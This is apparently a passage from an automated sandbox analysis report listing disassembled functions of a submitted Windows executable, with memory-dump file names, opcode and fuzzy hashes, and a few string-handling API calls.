                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                          • Instruction ID: e0c60a541a5106e25e0a2f50f35f038ee2aa27f15edb78bccdd8f3c871378321
                                                          • Opcode Fuzzy Hash: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                          • Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44
                                                          Function 004063EE Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                          • Instruction ID: c1f18cc480c27d0a28c5d6dc1e8cd9b1e5e62e2ab7f78041d4dc85e199002e6a
                                                          • Opcode Fuzzy Hash: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                          • Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84
                                                          Function 0040683C Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                          • Instruction ID: 317a4f11872e46a6f39a96627fb546a7164eb21cb9e645d400dda74b69288846
                                                          • Opcode Fuzzy Hash: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                          • Instruction Fuzzy Hash: 48713471D04228DFEF24CFA8C8447ADBBB1FB48305F15816AD856BB281C7785A96DF44
                                                          Function 0040695A Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                          • Instruction ID: 7b464a411068ed62169f7738ff9b09ef3af2f2625e32a791141ed05019b82bd1
                                                          • Opcode Fuzzy Hash: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                          • Instruction Fuzzy Hash: A4714571E04228DFEF28CF98C8447ADBBB1FB48301F15816AD456BB281C7785996DF44
                                                          Function 004068A6 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                          • Instruction ID: 924b227091e8338000478ad755e115b80dfeef44851b3a3b0f99ac33e872c674
                                                          • Opcode Fuzzy Hash: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                          • Instruction Fuzzy Hash: 07713571E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                          Function 00405B19 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                          • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                                          • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                                          • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.3152844793.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000002.00000002.3152809060.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152880786.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3152906314.0000000000409000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000002.00000002.3153008704.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                          • String ID:
                                                          • API String ID: 190613189-0
                                                          • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                          • Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
                                                          • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                          • Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9